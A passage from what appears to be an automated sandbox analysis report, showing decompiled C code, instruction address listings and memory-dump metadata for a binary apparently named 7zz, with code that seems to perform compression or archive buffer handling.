														do {
															 *((char*)( *((intOrPtr*)(_t629 + 4)) +  *_t629)) = _t657 >> _t461;
															_t589 =  *((intOrPtr*)(_t629 + 4)) + 1;
															 *((intOrPtr*)(_t629 + 4)) = _t589;
															__eflags = _t589 -  *((intOrPtr*)(_t629 + 8));
															if(__eflags == 0) {
																L0040EFBD(_t629, __eflags);
															}
															_t461 = _t461 - 8;
															__eflags = _t461;
														} while (_t461 >= 0);
														 *(_t661 + 0x80) =  *(_t661 + 0x84);
														goto L97;
													}
													_t630 = _t640[2];
													__eflags = _t630 - 0xff000000;
													_t640[4] = _t390 << 8;
													if(_t630 < 0xff000000) {
														L72:
														_t462 = _t640[1];
														_t631 =  &(_t640[6]);
														do {
															 *((char*)( *_t631 + _t631[1])) = L0046B2E0(_t640[2], 0x20, _t640[3]) + _t462;
															_t593 = _t631[1] + 1;
															_t631[1] = _t593;
															__eflags = _t593 - _t631[2];
															if(__eflags == 0) {
																L0040EFBD(_t631, __eflags);
															}
															_t462 = _t462 | 0x000000ff;
															_t402 =  *_t640 - 1;
															__eflags = _t402;
															 *_t640 = _t402;
														} while (_t402 != 0);
														_t630 = _t640[2];
														_t404 = _t630 >> 0x18;
														__eflags = _t404;
														_t640[1] = _t404;
														L77:
														_t453 =  *(_t661 + 0x94);
														_t632 = _t630 << 8;
														__eflags = _t632;
														_t640[2] = _t632;
														 *_t640 =  *_t640 + 1;
														_t640[3] = 0;
														goto L78;
													}
													_t407 = L0046B2E0(_t630, 0x20, _t640[3]);
													__eflags = _t407;
													if(_t407 == 0) {
														goto L77;
													}
													goto L72;
												}
											}
											__eflags = _t493 - 0xff;
											if(_t493 == 0xff) {
												goto L64;
											}
											_t494 = 0;
											goto L65;
										}
										__eflags = 0 -  *(_t661 + 0x5c);
										if(__eflags > 0) {
											L60:
											_t494 = 0;
											goto L65;
										}
										if(__eflags < 0) {
											goto L64;
										}
										__eflags = _t568 -  *((intOrPtr*)(_t661 + 0x58));
										if(_t568 <  *((intOrPtr*)(_t661 + 0x58))) {
											goto L64;
										}
										goto L60;
									}
									_t658 = _t649 +  *((intOrPtr*)(_t661 + 0x48));
									asm("adc ebx, edi");
									__eflags =  *(_t661 + 0x3c);
									if(__eflags > 0) {
										L38:
										__eflags = _t357;
										if(_t357 != 0) {
											_t634 =  *(_t661 + 0x40);
											_t597 =  *(_t661 + 0x3c);
											_t411 =  *(_t661 + 0x38) - _t634;
											__eflags = _t411;
											asm("sbb edx, [esp+0x44]");
											 *(_t661 + 0x6c) = _t597;
											if(_t411 != 0) {
												L46:
												__eflags = _t493;
												if(_t493 == 0) {
													goto L64;
												}
												__eflags = _t493 - 0xff;
												if(_t493 == 0xff) {
													goto L64;
												}
												_t494 = 0;
												goto L65;
											}
											__eflags = _t411 - 0x1000000;
											if(_t411 <= 0x1000000) {
												asm("cdq");
												asm("adc edx, ebx");
												_t414 =  *(_t661 + 0x2c) + _t658 + 5;
												asm("adc edx, 0x0");
												__eflags = _t597 -  *(_t661 + 0x44);
												if(__eflags < 0) {
													L55:
													_t494 = 0;
													goto L65;
												}
												if(__eflags > 0) {
													L52:
													__eflags = _t597 -  *(_t661 + 0x3c);
													if(__eflags > 0) {
														goto L55;
													}
													if(__eflags < 0) {
														goto L64;
													}
													__eflags = _t414 -  *(_t661 + 0x38);
													if(_t414 <  *(_t661 + 0x38)) {
														goto L64;
													}
													goto L55;
												}
												__eflags = _t414 - _t634;
												if(_t414 < _t634) {
													goto L55;
												}
												goto L52;
											}
											goto L46;
										}
										__eflags =  *(_t661 + 0x88);
										if( *(_t661 + 0x88) == 0) {
											goto L46;
										}
										__eflags = 0 -  *(_t661 + 0x5c);
										if(__eflags > 0) {
											L43:
											_t494 = 0;
											goto L65;
										}
										if(__eflags < 0) {
											goto L64;
										}
										__eflags =  *(_t661 + 0x1c) -  *((intOrPtr*)(_t661 + 0x58));
										if( *(_t661 + 0x1c) <  *((intOrPtr*)(_t661 + 0x58))) {
											goto L64;
										}
										goto L43;
									}
									if(__eflags < 0) {
										goto L27;
										do {
											do {
												L27:
												_t624 =  *((intOrPtr*)( *_t357 + 0xc))(_t357,  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t661 + 0x58)), _t661 + 0x60);
												__eflags = _t624;
												if(_t624 != 0) {
													__eflags = _t624 - 1;
													if(_t624 == 1) {
														L31:
														_t357 =  *(_t661 + 0x14);
														__eflags = _t357;
														if(_t357 != 0) {
															 *((intOrPtr*)( *_t357 + 8))(_t357);
															_t357 = 0;
															__eflags = 0;
															 *(_t661 + 0x14) = 0;
														}
														 *(_t661 + 0x40) = 0;
														 *(_t661 + 0x44) = 0;
														__eflags = 0xffffffff;
														 *(_t661 + 0x38) = 0xffffffff;
														 *(_t661 + 0x3c) = 0xffffffff;
														goto L34;
													}
													__eflags = _t624 - 0x80004001;
													if(_t624 != 0x80004001) {
														_t420 =  *(_t661 + 0x14);
														 *(_t661 + 0x78) = 0;
														__eflags = _t420;
														if(_t420 != 0) {
															 *((intOrPtr*)( *_t420 + 8))(_t420);
														}
														_t644 =  *((intOrPtr*)(_t661 + 0x10));
														 *(_t661 + 0x78) = 0xffffffff;
														L00437D6C(_t644 + 0x24);
														L00437D6C(_t644 + 0x4c);
														_t423 =  *(_t644 + 0x74);
														__eflags = _t423;
														if(_t423 != 0) {
															 *((intOrPtr*)( *_t423 + 8))(_t423);
															 *(_t644 + 0x74) = 0;
														}
														_t424 =  *(_t644 + 0xb4);
														__eflags = _t424;
														if(_t424 != 0) {
															 *((intOrPtr*)( *_t424 + 8))(_t424);
															 *(_t644 + 0xb4) = 0;
														}
														L130:
														_t310 = _t624;
														goto L142;
													}
													goto L31;
												}
												_t428 =  *(_t661 + 0x38);
												_t545 =  *(_t661 + 0x3c);
												 *(_t661 + 0x40) = _t428;
												 *(_t661 + 0x44) = _t545;
												 *(_t661 + 0x38) = _t428 +  *((intOrPtr*)(_t661 + 0x60));
												asm("adc ecx, edi");
												 *(_t661 + 0x3c) = _t545;
												asm("adc eax, 0x0");
												 *((intOrPtr*)(_t661 + 0x50)) =  *((intOrPtr*)(_t661 + 0x50)) + 1;
												_t357 =  *(_t661 + 0x14);
												L34:
												__eflags =  *(_t661 + 0x3c);
											} while (__eflags < 0);
											if(__eflags > 0) {
												break;
											}
											__eflags =  *(_t661 + 0x38) - _t658;
										} while ( *(_t661 + 0x38) < _t658);
										_t493 =  *(_t661 + 0x84);
										goto L38;
									}
									__eflags =  *(_t661 + 0x38) - _t658;
									if( *(_t661 + 0x38) >= _t658) {
										goto L38;
									}
									goto L27;
								} else {
									__eflags =  *(_t661 + 0x80) - 0xf;
									if( *(_t661 + 0x80) != 0xf) {
										L22:
										 *(_t661 + 0x8c) = _t649 + 1;
										L96:
										 *(_t661 + 0x80) = _t453;
										goto L97;
									}
									__eflags = (_t453 & 0x000000f0) - 0x80;
									if((_t453 & 0x000000f0) == 0x80) {
										goto L23;
									}
									goto L22;
								}
								L97:
								_t650 =  *(_t661 + 0x8c);
								__eflags = _t650 -  *(_t661 + 0x30);
							} while (_t650 <=  *(_t661 + 0x30));
							_t364 =  *(_t661 + 0x98);
							 *((intOrPtr*)(_t661 + 0x18)) =  *((intOrPtr*)(_t661 + 0x18)) + _t650;
							_t451 = 0;
							asm("adc edx, ebx");
							__eflags = _t364;
							 *((intOrPtr*)(_t661 + 0x48)) =  *((intOrPtr*)(_t661 + 0x48)) + _t650;
							if(_t364 == 0) {
								L100:
								_t623 =  *(_t661 + 0x20);
								__eflags = _t650 - _t623;
								if(_t650 >= _t623) {
									L102:
									continue;
								} else {
									goto L101;
								}
								do {
									L101:
									_t451 = _t451 + 1;
									_t650 = _t650 + 1;
									__eflags = _t650 - _t623;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x10)) + 8)) + _t451 - 1)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x10)) + 8)) + _t650 - 1));
								} while (_t650 < _t623);
								goto L102;
							}
							_t624 =  *((intOrPtr*)( *_t364 + 0xc))(_t364, _t661 + 0x48, 0);
							__eflags = _t624;
							if(_t624 != 0) {
								_t368 =  *(_t661 + 0x14);
								 *(_t661 + 0x78) = 0;
								__eflags = _t368;
								if(_t368 != 0) {
									 *((intOrPtr*)( *_t368 + 8))(_t368);
								}
								_t643 =  *((intOrPtr*)(_t661 + 0x10));
								 *(_t661 + 0x78) = 0xffffffff;
								_t369 =  *(_t643 + 0x24);
								__eflags = _t369 - _t451;
								if(_t369 != _t451) {
									 *((intOrPtr*)( *_t369 + 8))(_t369);
									 *(_t643 + 0x24) = _t451;
								}
								_t370 =  *(_t643 + 0x4c);
								__eflags = _t370 - _t451;
								if(_t370 != _t451) {
									 *((intOrPtr*)( *_t370 + 8))(_t370);
									 *(_t643 + 0x4c) = _t451;
								}
								_t371 =  *(_t643 + 0x74);
								__eflags = _t371 - _t451;
								if(_t371 != _t451) {
									 *((intOrPtr*)( *_t371 + 8))(_t371);
									 *(_t643 + 0x74) = _t451;
								}
								_t372 =  *(_t643 + 0xb4);
								__eflags = _t372 - _t451;
								if(_t372 == _t451) {
									goto L130;
								} else {
									 *((intOrPtr*)( *_t372 + 8))(_t372);
									 *(_t643 + 0xb4) = _t451;
									_t310 = _t624;
									goto L142;
								}
							}
							goto L100;
						}
					}
					_t446 =  *_t312;
					__eflags = _t446;
					if(_t446 == 0) {
						goto L10;
					}
					_t548 =  *_t446;
					_t447 =  *(_t446 + 4);
					__eflags = _t447;
					 *((intOrPtr*)(_t661 + 0x58)) = _t548;
					 *(_t661 + 0x5c) = _t447;
					if(__eflags > 0) {
						goto L10;
					}
					if(__eflags < 0) {
						L9:
						 *(_t661 + 0x88) = 1;
						goto L10;
					}
					__eflags = _t548 - 0x1000000;
					if(_t548 > 0x1000000) {
						goto L10;
					}
					goto L9;
				} else {
					_t310 = 0x8007000e;
					goto L142;
				}
			}




























































































                                                                                  0x004442e0
                                                                                  0x004442e2
                                                                                  0x004442ed
                                                                                  0x004442ee
                                                                                  0x004442f5
                                                                                  0x00444300
                                                                                  0x00444305
                                                                                  0x00444309
                                                                                  0x00444bf6
                                                                                  0x00444bf6
                                                                                  0x00444bfb
                                                                                  0x00444c03
                                                                                  0x00444c0d
                                                                                  0x00444c0d
                                                                                  0x0044430f
                                                                                  0x00444317
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444324
                                                                                  0x00444330
                                                                                  0x00444339
                                                                                  0x0044433b
                                                                                  0x00444343
                                                                                  0x00444347
                                                                                  0x0044434b
                                                                                  0x00444376
                                                                                  0x00444376
                                                                                  0x0044437a
                                                                                  0x0044438b
                                                                                  0x00444391
                                                                                  0x00444394
                                                                                  0x00444398
                                                                                  0x004443a0
                                                                                  0x004443ac
                                                                                  0x004443b4
                                                                                  0x004443c0
                                                                                  0x004443c8
                                                                                  0x004443d7
                                                                                  0x004443dc
                                                                                  0x004443e5
                                                                                  0x004443ea
                                                                                  0x004443fd
                                                                                  0x00444400
                                                                                  0x00444407
                                                                                  0x0044440d
                                                                                  0x00444411
                                                                                  0x00444411
                                                                                  0x00444413
                                                                                  0x00444424
                                                                                  0x0044442c
                                                                                  0x0044442e
                                                                                  0x0044442e
                                                                                  0x00444430
                                                                                  0x00444434
                                                                                  0x00444438
                                                                                  0x0044443c
                                                                                  0x00444443
                                                                                  0x00444447
                                                                                  0x0044444b
                                                                                  0x0044444f
                                                                                  0x00444453
                                                                                  0x00444457
                                                                                  0x0044445b
                                                                                  0x00444460
                                                                                  0x00444462
                                                                                  0x00444462
                                                                                  0x00444464
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444466
                                                                                  0x00444466
                                                                                  0x0044446a
                                                                                  0x00444482
                                                                                  0x00444484
                                                                                  0x00444486
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044448c
                                                                                  0x00444490
                                                                                  0x00444492
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444494
                                                                                  0x0044449d
                                                                                  0x0044449d
                                                                                  0x0044449f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044449f
                                                                                  0x004449c7
                                                                                  0x004449cb
                                                                                  0x004449d0
                                                                                  0x004449d2
                                                                                  0x004449d7
                                                                                  0x004449d7
                                                                                  0x004449da
                                                                                  0x004449de
                                                                                  0x004449e9
                                                                                  0x004449f1
                                                                                  0x004449f9
                                                                                  0x00444a04
                                                                                  0x00444a09
                                                                                  0x00000000
                                                                                  0x004444a1
                                                                                  0x004444a1
                                                                                  0x004444a3
                                                                                  0x004444a6
                                                                                  0x004444aa
                                                                                  0x00444a10
                                                                                  0x00444a12
                                                                                  0x00444a14
                                                                                  0x00444ad1
                                                                                  0x00444ad1
                                                                                  0x00444adc
                                                                                  0x00444ade
                                                                                  0x00444ae2
                                                                                  0x00444ae4
                                                                                  0x00444ae9
                                                                                  0x00444aee
                                                                                  0x00444aee
                                                                                  0x00444af4
                                                                                  0x00444afc
                                                                                  0x00444b04
                                                                                  0x00444b0c
                                                                                  0x00444b11
                                                                                  0x00444b17
                                                                                  0x00444b19
                                                                                  0x00444b1e
                                                                                  0x00444b21
                                                                                  0x00444b21
                                                                                  0x00444b2b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444a1a
                                                                                  0x00444a1a
                                                                                  0x00444a1a
                                                                                  0x00444a24
                                                                                  0x00444a27
                                                                                  0x00444a2c
                                                                                  0x00444a35
                                                                                  0x00444a36
                                                                                  0x00444a38
                                                                                  0x00444a3b
                                                                                  0x00444a3d
                                                                                  0x00444a3d
                                                                                  0x00444a42
                                                                                  0x00444a45
                                                                                  0x00444a56
                                                                                  0x00444a59
                                                                                  0x00444a62
                                                                                  0x00444a6a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444a71
                                                                                  0x00444a74
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444a76
                                                                                  0x00000000
                                                                                  0x00444a76
                                                                                  0x00444a5b
                                                                                  0x00000000
                                                                                  0x00444a47
                                                                                  0x00444a4e
                                                                                  0x00444a7b
                                                                                  0x00444a8e
                                                                                  0x00444a9f
                                                                                  0x00444aa6
                                                                                  0x00444aa9
                                                                                  0x00444aae
                                                                                  0x00444ab0
                                                                                  0x00444ab0
                                                                                  0x00444ab5
                                                                                  0x00444ab8
                                                                                  0x00444ab8
                                                                                  0x00444aae
                                                                                  0x00444abd
                                                                                  0x00444ac1
                                                                                  0x00444ac2
                                                                                  0x00444ac4
                                                                                  0x00444ac4
                                                                                  0x00000000
                                                                                  0x00444a1a
                                                                                  0x004444b0
                                                                                  0x004444b0
                                                                                  0x004444b3
                                                                                  0x004444be
                                                                                  0x004444c2
                                                                                  0x004444c2
                                                                                  0x004444c6
                                                                                  0x004444d6
                                                                                  0x004444d9
                                                                                  0x004444dc
                                                                                  0x004444df
                                                                                  0x004444ec
                                                                                  0x004444ed
                                                                                  0x004444ef
                                                                                  0x004444f2
                                                                                  0x004444f4
                                                                                  0x004444f4
                                                                                  0x004444fe
                                                                                  0x00444501
                                                                                  0x00444524
                                                                                  0x0044452d
                                                                                  0x00444542
                                                                                  0x00444550
                                                                                  0x00444554
                                                                                  0x0044455a
                                                                                  0x0044455a
                                                                                  0x0044455e
                                                                                  0x00444562
                                                                                  0x00444564
                                                                                  0x00444568
                                                                                  0x004446de
                                                                                  0x004446e0
                                                                                  0x004446f8
                                                                                  0x004446fa
                                                                                  0x00444705
                                                                                  0x00444705
                                                                                  0x00444707
                                                                                  0x00444707
                                                                                  0x0044470e
                                                                                  0x00444711
                                                                                  0x00444723
                                                                                  0x00444729
                                                                                  0x00444729
                                                                                  0x00444713
                                                                                  0x0044471a
                                                                                  0x0044471a
                                                                                  0x0044472e
                                                                                  0x00444730
                                                                                  0x0044487b
                                                                                  0x0044488a
                                                                                  0x004448a0
                                                                                  0x004448a7
                                                                                  0x004448aa
                                                                                  0x004448af
                                                                                  0x0044493e
                                                                                  0x0044493e
                                                                                  0x0044493e
                                                                                  0x0044493e
                                                                                  0x00000000
                                                                                  0x0044493e
                                                                                  0x004448b5
                                                                                  0x004448bb
                                                                                  0x004448c1
                                                                                  0x004448c4
                                                                                  0x004448d9
                                                                                  0x004448d9
                                                                                  0x004448dc
                                                                                  0x004448df
                                                                                  0x004448f6
                                                                                  0x004448ff
                                                                                  0x00444902
                                                                                  0x00444905
                                                                                  0x00444907
                                                                                  0x0044490b
                                                                                  0x0044490b
                                                                                  0x00444912
                                                                                  0x00444915
                                                                                  0x00444915
                                                                                  0x00444916
                                                                                  0x00444916
                                                                                  0x0044491a
                                                                                  0x0044491f
                                                                                  0x0044491f
                                                                                  0x00444922
                                                                                  0x00444925
                                                                                  0x00444927
                                                                                  0x0044492f
                                                                                  0x0044492f
                                                                                  0x00444932
                                                                                  0x00444935
                                                                                  0x00444937
                                                                                  0x00000000
                                                                                  0x00444937
                                                                                  0x004448d0
                                                                                  0x004448d5
                                                                                  0x004448d7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444736
                                                                                  0x00444736
                                                                                  0x00444739
                                                                                  0x00444745
                                                                                  0x0044474f
                                                                                  0x00444755
                                                                                  0x0044475d
                                                                                  0x0044476e
                                                                                  0x00444775
                                                                                  0x00444778
                                                                                  0x0044477d
                                                                                  0x0044480c
                                                                                  0x00444816
                                                                                  0x00444819
                                                                                  0x00444820
                                                                                  0x0044482f
                                                                                  0x00444822
                                                                                  0x00444826
                                                                                  0x00444826
                                                                                  0x00444832
                                                                                  0x00444836
                                                                                  0x0044483b
                                                                                  0x00444846
                                                                                  0x0044484f
                                                                                  0x00444852
                                                                                  0x00444855
                                                                                  0x00444857
                                                                                  0x0044485b
                                                                                  0x0044485b
                                                                                  0x00444860
                                                                                  0x00444860
                                                                                  0x00444860
                                                                                  0x0044486c
                                                                                  0x00000000
                                                                                  0x0044486c
                                                                                  0x00444783
                                                                                  0x00444789
                                                                                  0x0044478f
                                                                                  0x00444792
                                                                                  0x004447a7
                                                                                  0x004447a7
                                                                                  0x004447aa
                                                                                  0x004447ad
                                                                                  0x004447c4
                                                                                  0x004447cd
                                                                                  0x004447d0
                                                                                  0x004447d3
                                                                                  0x004447d5
                                                                                  0x004447d9
                                                                                  0x004447d9
                                                                                  0x004447e0
                                                                                  0x004447e3
                                                                                  0x004447e3
                                                                                  0x004447e4
                                                                                  0x004447e4
                                                                                  0x004447e8
                                                                                  0x004447ed
                                                                                  0x004447ed
                                                                                  0x004447f0
                                                                                  0x004447f3
                                                                                  0x004447f5
                                                                                  0x004447fd
                                                                                  0x004447fd
                                                                                  0x00444800
                                                                                  0x00444803
                                                                                  0x00444805
                                                                                  0x00000000
                                                                                  0x00444805
                                                                                  0x0044479e
                                                                                  0x004447a3
                                                                                  0x004447a5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004447a5
                                                                                  0x00444730
                                                                                  0x004446fc
                                                                                  0x004446ff
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444701
                                                                                  0x00000000
                                                                                  0x00444701
                                                                                  0x004446e8
                                                                                  0x004446ea
                                                                                  0x004446f4
                                                                                  0x004446f4
                                                                                  0x00000000
                                                                                  0x004446f4
                                                                                  0x004446ec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446ee
                                                                                  0x004446f2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446f2
                                                                                  0x00444578
                                                                                  0x0044457e
                                                                                  0x00444580
                                                                                  0x00444582
                                                                                  0x00444646
                                                                                  0x00444646
                                                                                  0x00444648
                                                                                  0x00444680
                                                                                  0x00444684
                                                                                  0x00444688
                                                                                  0x00444688
                                                                                  0x0044468a
                                                                                  0x0044468e
                                                                                  0x00444692
                                                                                  0x0044469b
                                                                                  0x0044469b
                                                                                  0x0044469d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044469f
                                                                                  0x004446a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446a4
                                                                                  0x00000000
                                                                                  0x004446a4
                                                                                  0x00444694
                                                                                  0x00444699
                                                                                  0x004446b0
                                                                                  0x004446b3
                                                                                  0x004446b5
                                                                                  0x004446b8
                                                                                  0x004446bb
                                                                                  0x004446bd
                                                                                  0x004446d3
                                                                                  0x004446d3
                                                                                  0x00000000
                                                                                  0x004446d3
                                                                                  0x004446bf
                                                                                  0x004446c5
                                                                                  0x004446c5
                                                                                  0x004446c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446cd
                                                                                  0x004446d1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446d1
                                                                                  0x004446c1
                                                                                  0x004446c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004446c3
                                                                                  0x00000000
                                                                                  0x00444699
                                                                                  0x00444651
                                                                                  0x00444653
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044465b
                                                                                  0x0044465d
                                                                                  0x00444675
                                                                                  0x00444675
                                                                                  0x00000000
                                                                                  0x00444675
                                                                                  0x0044465f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044466d
                                                                                  0x0044466f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044466f
                                                                                  0x00444588
                                                                                  0x00000000
                                                                                  0x00444594
                                                                                  0x00444594
                                                                                  0x00444594
                                                                                  0x004445a9
                                                                                  0x004445ab
                                                                                  0x004445ad
                                                                                  0x004445ef
                                                                                  0x004445f2
                                                                                  0x00444600
                                                                                  0x00444600
                                                                                  0x00444604
                                                                                  0x00444606
                                                                                  0x0044460b
                                                                                  0x0044460e
                                                                                  0x0044460e
                                                                                  0x00444610
                                                                                  0x00444610
                                                                                  0x00444616
                                                                                  0x0044461a
                                                                                  0x0044461e
                                                                                  0x00444621
                                                                                  0x00444625
                                                                                  0x00000000
                                                                                  0x00444625
                                                                                  0x004445f4
                                                                                  0x004445fa
                                                                                  0x00444b32
                                                                                  0x00444b36
                                                                                  0x00444b3b
                                                                                  0x00444b3d
                                                                                  0x00444b42
                                                                                  0x00444b42
                                                                                  0x00444b45
                                                                                  0x00444b49
                                                                                  0x00444b54
                                                                                  0x00444b5c
                                                                                  0x00444b61
                                                                                  0x00444b66
                                                                                  0x00444b68
                                                                                  0x00444b6d
                                                                                  0x00444b70
                                                                                  0x00444b70
                                                                                  0x00444b73
                                                                                  0x00444b79
                                                                                  0x00444b7b
                                                                                  0x00444b80
                                                                                  0x00444b83
                                                                                  0x00444b83
                                                                                  0x00444b89
                                                                                  0x00444b89
                                                                                  0x00000000
                                                                                  0x00444b89
                                                                                  0x00000000
                                                                                  0x004445fa
                                                                                  0x004445af
                                                                                  0x004445b7
                                                                                  0x004445bf
                                                                                  0x004445c5
                                                                                  0x004445c9
                                                                                  0x004445d1
                                                                                  0x004445d3
                                                                                  0x004445de
                                                                                  0x004445e1
                                                                                  0x004445e9
                                                                                  0x00444629
                                                                                  0x00444629
                                                                                  0x00444629
                                                                                  0x00444633
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444635
                                                                                  0x00444635
                                                                                  0x0044463f
                                                                                  0x00000000
                                                                                  0x0044463f
                                                                                  0x0044458a
                                                                                  0x0044458e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444503
                                                                                  0x00444503
                                                                                  0x0044450b
                                                                                  0x00444517
                                                                                  0x00444518
                                                                                  0x00444945
                                                                                  0x00444945
                                                                                  0x00000000
                                                                                  0x00444945
                                                                                  0x00444512
                                                                                  0x00444515
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444515
                                                                                  0x0044494c
                                                                                  0x0044494c
                                                                                  0x00444957
                                                                                  0x00444957
                                                                                  0x0044496b
                                                                                  0x00444976
                                                                                  0x0044497a
                                                                                  0x0044497f
                                                                                  0x00444981
                                                                                  0x00444983
                                                                                  0x0044498b
                                                                                  0x004449a3
                                                                                  0x004449a3
                                                                                  0x004449a7
                                                                                  0x004449a9
                                                                                  0x004449c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004449ab
                                                                                  0x004449ab
                                                                                  0x004449af
                                                                                  0x004449b0
                                                                                  0x004449b4
                                                                                  0x004449ba
                                                                                  0x004449ba
                                                                                  0x00000000
                                                                                  0x004449ab
                                                                                  0x00444999
                                                                                  0x0044499b
                                                                                  0x0044499d
                                                                                  0x00444b8d
                                                                                  0x00444b91
                                                                                  0x00444b96
                                                                                  0x00444b98
                                                                                  0x00444b9d
                                                                                  0x00444b9d
                                                                                  0x00444ba0
                                                                                  0x00444ba4
                                                                                  0x00444bac
                                                                                  0x00444baf
                                                                                  0x00444bb1
                                                                                  0x00444bb6
                                                                                  0x00444bb9
                                                                                  0x00444bb9
                                                                                  0x00444bbc
                                                                                  0x00444bbf
                                                                                  0x00444bc1
                                                                                  0x00444bc6
                                                                                  0x00444bc9
                                                                                  0x00444bc9
                                                                                  0x00444bcc
                                                                                  0x00444bcf
                                                                                  0x00444bd1
                                                                                  0x00444bd6
                                                                                  0x00444bd9
                                                                                  0x00444bd9
                                                                                  0x00444bdc
                                                                                  0x00444be2
                                                                                  0x00444be4
                                                                                  0x00000000
                                                                                  0x00444be6
                                                                                  0x00444be9
                                                                                  0x00444bec
                                                                                  0x00444bf2
                                                                                  0x00000000
                                                                                  0x00444bf2
                                                                                  0x00444be4
                                                                                  0x00000000
                                                                                  0x0044499d
                                                                                  0x0044445b
                                                                                  0x0044434d
                                                                                  0x0044434f
                                                                                  0x00444351
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444353
                                                                                  0x00444355
                                                                                  0x00444358
                                                                                  0x0044435a
                                                                                  0x0044435e
                                                                                  0x00444362
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444364
                                                                                  0x0044436e
                                                                                  0x0044436e
                                                                                  0x00000000
                                                                                  0x0044436e
                                                                                  0x00444366
                                                                                  0x0044436c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00444326
                                                                                  0x00444326
                                                                                  0x00000000
                                                                                  0x00444326

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
                                                                                  • Instruction ID: d9c78973a52d2a71a409461f923dbd808430b2c09cbe0837c917e918da1c98db
                                                                                  • Opcode Fuzzy Hash: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
                                                                                  • Instruction Fuzzy Hash: D75239706087418FE724CF29C480B6AF7E2BFC5314F148A1EE59987791DB38E846CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004514F0 Relevance: .6, Instructions: 565COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 97%
                                                                                  			E004514F0(void* __ecx) {
				signed int _t218;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				void* _t238;
				signed int _t239;
				void* _t243;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t273;
				signed int _t274;
				char _t282;
				void* _t288;
				intOrPtr _t298;
				signed int _t301;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t317;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t325;
				signed int _t330;
				signed int _t332;
				signed int _t338;
				signed int _t351;
				signed int _t361;
				signed int _t370;
				intOrPtr _t371;
				signed int _t379;
				void* _t383;
				signed int _t394;
				void* _t396;
				signed int _t403;
				intOrPtr _t405;
				signed int _t406;
				signed int _t407;
				intOrPtr* _t412;
				signed int _t425;
				intOrPtr _t430;
				signed int _t431;
				signed int _t437;
				signed int _t449;
				intOrPtr _t455;
				intOrPtr _t466;
				signed int* _t473;
				unsigned int _t477;
				signed int _t480;
				signed int _t485;
				signed int _t489;
				unsigned int _t493;
				signed int _t496;
				intOrPtr _t497;
